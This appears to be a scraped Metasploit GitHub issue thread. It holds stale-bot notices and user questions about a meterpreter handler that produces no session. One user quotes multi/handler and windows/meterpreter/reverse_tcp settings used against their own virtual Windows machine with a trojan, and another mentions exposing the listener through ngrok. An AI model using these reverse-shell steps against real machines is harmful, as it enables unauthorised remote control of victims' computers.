Closed A91K3C1l closed 2 years ago
Could be many things, most likely a networking issue is my guess
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
@A91K3C1l Can you paste all metasploit you usage . Thank you
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Hi again!
It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
i am trying to hack my virtual window in the same network
for the trojan lhost=10.0.2.6 lport=2525
msfconsole =use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp set lhost=10.0.2.6 lport=2525 set target=0
after downloading the trojan in virtual window exploit , exploit -j -z , run
exploit completed but no session was created.. what can i do
I want to ask why the session was not created even though the exploit was successful and the target vuln was the following output
I run ngrok tcp 1337 and I enter the host and port I got from ngrok to metasploit lhost and lport Why??